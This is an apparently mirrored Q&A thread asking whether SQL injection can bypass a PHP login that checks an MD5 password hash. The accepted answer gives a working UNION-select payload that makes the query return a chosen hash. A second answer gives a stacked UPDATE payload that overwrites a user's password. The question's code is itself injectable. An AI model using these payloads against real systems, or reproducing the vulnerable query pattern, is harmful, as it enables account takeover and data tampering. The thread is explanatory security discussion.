sql injection change returned values
Question
I recently thought about something like this:
$sql = "SELECT password FROM users WHERE user = '" . $_POST["user"] . "'";
$result = mysql_query($sql);
if (myql_num_rows($result) != 1) {
//Error
}
$data = mysql_fetch_array($result);
if ($data["password"] == md5($_POST["password"])) {
//Welcome
} else {
//Error
}
Even though no parameterized querys or atleast escaping is used, I could not think of a proper sql injection with which you can get trough to the Welcome point. You would somehow need to modify the returned password whose md5 value you can then just use as a password.
Any ideas if this is possible?
2 answers
solution1
8 ACCPTED 2013-01-10 14:51:27
Use the following value for User:
obviouslyinvalidusername' union select MD5('password123') as password --
Then a password of password123 should authenticate. I don't know what user account you would be logged in at this point, because that part of the logic isn't shown.
solution2
0 2013-01-10 14:46:32
"'; UPDATE user SET password=MD5('fakepass') where username='username'"
这会将任意密码作为md5哈希插入数据库。
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.